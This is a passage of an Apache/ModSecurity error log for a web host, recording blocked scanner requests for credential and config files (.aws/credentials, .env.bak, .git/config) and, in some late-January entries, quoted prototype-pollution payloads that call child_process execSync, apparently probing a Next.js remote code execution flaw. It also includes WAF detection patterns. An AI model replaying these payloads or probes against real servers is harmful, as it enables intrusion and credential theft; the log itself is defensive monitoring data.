.axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/etc/boto.cfg"] [unique_id "aXPe-_0tTn3JODp9pXoeAAAAABA"] [Fri Jan 23 22:50:21.326306 2026] [:error] [pid 15538:tid 15586] [client 185.177.72.13:7836] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/.git/config.bak"] [unique_id "aXPfDXH7t7MeyHdI5OW1AAAAAFA"] [Fri Jan 23 22:50:21.332025 2026] [:error] [pid 15538:tid 15579] [client 185.177.72.13:7836] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/.git/config.old"] [unique_id "aXPfDXH7t7MeyHdI5OW1AQAAAEo"] [Fri Jan 23 22:50:26.002237 2026] [:error] [pid 15538:tid 15586] [client 185.177.72.13:7836] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aXPfEnH7t7MeyHdI5OW1FwAAAFA"] [Fri Jan 23 22:50:26.548933 2026] [:error] [pid 15538:tid 15584] [client 185.177.72.13:7836] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "aXPfEnH7t7MeyHdI5OW1HAAAAE4"] [Fri Jan 23 22:50:26.800804 2026] [:error] [pid 15538:tid 15574] [client 185.177.72.13:7836] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS_NAMES:*update*. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.web.dev-unit.com"] [uri "/package-updates/*"] [unique_id "aXPfEnH7t7MeyHdI5OW1HwAAAEU"] [Fri Jan 23 22:50:50.774825 2026] [autoindex:error] [pid 15629:tid 15638] [client 185.177.72.13:30604] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 24 01:51:28.367363 2026] [:error] [pid 15629:tid 15636] [client 185.177.72.56:40588] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "aXQJgM-vEegKBBgna6FiKgAAAMU"] [Sat Jan 24 01:51:37.329944 2026] [:error] [pid 15629:tid 15646] [client 185.177.72.56:57324] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/s3.key"] [unique_id "aXQJic-vEegKBBgna6FieQAAAM8"] [Sat Jan 24 01:51:39.221583 2026] [:error] [pid 15629:tid 15641] [client 185.177.72.56:57324] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/etc/boto.cfg"] [unique_id "aXQJi8-vEegKBBgna6FiiQAAAMo"] [Sat Jan 24 01:51:56.802182 2026] [:error] [pid 15629:tid 15642] [client 185.177.72.56:56608] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/.git/config.bak"] [unique_id "aXQJnM-vEegKBBgna6FjIAAAAMs"] [Sat Jan 24 01:51:56.810356 2026] [:error] [pid 15629:tid 15652] [client 185.177.72.56:56608] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/.git/config.old"] [unique_id "aXQJnM-vEegKBBgna6FjIQAAANU"] [Sat Jan 24 01:51:59.042799 2026] [:error] [pid 15629:tid 15652] [client 185.177.72.56:56608] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aXQJn8-vEegKBBgna6FjNgAAANU"] [Sat Jan 24 01:51:59.554871 2026] [:error] [pid 15629:tid 15648] [client 185.177.72.56:56608] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "aXQJn8-vEegKBBgna6FjOwAAANE"] [Sat Jan 24 01:51:59.807509 2026] [:error] [pid 15629:tid 15644] [client 185.177.72.56:56608] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS_NAMES:*update*. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.web.dev-unit.com"] [uri "/package-updates/*"] [unique_id "aXQJn8-vEegKBBgna6FjPwAAAM0"] [Sat Jan 24 01:52:23.910083 2026] [autoindex:error] [pid 15629:tid 15651] [client 185.177.72.56:47640] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 25 19:42:35.911689 2026] [:error] [pid 23271:tid 23295] [client 137.184.44.51:57678] [client 137.184.44.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:_csrf. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within REQUEST_COOKIES:_csrf: 25e5d2e34521bb0333e07b1f1a1298af7404ec0b421d881f25f830f662859bfea:2:{i:0;s:5:\\x22_csrf\\x22;i:1;s:32:\\x22GTWtNWNwL_Z0xSTCaYCKkfMe1k2DOsCM\\x22;}"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.web.dev-unit.com"] [uri "/"] [unique_id "aXZWCzAbgxI7aewZnVkd7AAAAoc"], referer: https://watsonsauctioneers.co.uk//wp-login.php [Mon Jan 26 19:57:04.541407 2026] [:error] [pid 17385:tid 17460] [client 216.81.245.209:38504] [client 216.81.245.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.bak"] [unique_id "aXeq8C72UvX9BTgPlmu99wAAAIw"] [Mon Jan 26 19:57:04.550819 2026] [:error] [pid 17385:tid 17461] [client 216.81.245.209:40874] [client 216.81.245.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/database.sql"] [unique_id "aXeq8C72UvX9BTgPlmu9-wAAAI0"] [Mon Jan 26 23:33:45.766042 2026] [authz_host:error] [pid 17089:tid 17107] [client 185.177.72.60:55582] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Mon Jan 26 23:33:45.766074 2026] [authz_core:error] [pid 17089:tid 17107] [client 185.177.72.60:55582] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Jan 28 10:19:41.329145 2026] [:error] [pid 4058:tid 4097] [client 85.11.167.4:52604] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769588414_8603',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769588414_860..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXnGnWWpsb9ZGpCjke9SqgAAAIA"], referer: https://web.dev-unit.com [Wed Jan 28 10:19:41.405883 2026] [:error] [pid 6774:tid 6849] [client 85.11.167.4:52606] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769588414',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769588414',{'timeo..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXnGnVhOp7ZZChWKpwvCoQAAAVc"], referer: https://web.dev-unit.com [Wed Jan 28 14:00:39.669737 2026] [:error] [pid 6774:tid 6839] [client 3.253.129.87:40808] [client 3.253.129.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aXn6Z1hOp7ZZChWKpwtM4AAAAVI"] [Thu Feb 05 09:18:19.372949 2026] [core:error] [pid 28044:tid 28051] (5)Input/output error: [client 34.10.64.2:50008] AH00036: access to / failed (filesystem path '/home') [Thu Feb 05 09:18:21.665347 2026] [core:error] [pid 2383:tid 2464] (5)Input/output error: [client 34.10.64.2:50774] AH00036: access to /phpinfo.php failed (filesystem path '/home') [Thu Feb 05 09:18:23.886619 2026] [core:error] [pid 28468:tid 28479] (5)Input/output error: [client 34.10.64.2:50235] AH00036: access to /test.php failed (filesystem path '/home') [Thu Feb 05 09:18:26.496435 2026] [core:error] [pid 28404:tid 28429] (5)Input/output error: [client 34.10.64.2:50029] AH00036: access to /_profiler/phpinfo failed (filesystem path '/home') [Thu Feb 05 09:18:28.366168 2026] [core:error] [pid 2383:tid 2425] (5)Input/output error: [client 34.10.64.2:64985] AH00036: access to /.env/.env.bak failed (filesystem path '/home') [Thu Feb 05 09:18:29.730739 2026] [core:error] [pid 2383:tid 2458] (5)Input/output error: [client 34.10.64.2:63416] AH00036: access to / failed (filesystem path '/home') [Thu Feb 05 09:18:31.783512 2026] [core:error] [pid 28468:tid 28480] (5)Input/output error: [client 34.10.64.2:62878] AH00036: access to /index.php failed (filesystem path '/home') [Thu Feb 05 09:18:33.563120 2026] [core:error] [pid 2382:tid 2417] (5)Input/output error: [client 34.10.64.2:63898] AH00036: access to /.aws/credentials failed (filesystem path '/home') [Mon Feb 09 07:13:41.499526 2026] [:error] [pid 12756:tid 12823] [client 74.7.227.165:36238] [client 74.7.227.165] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ 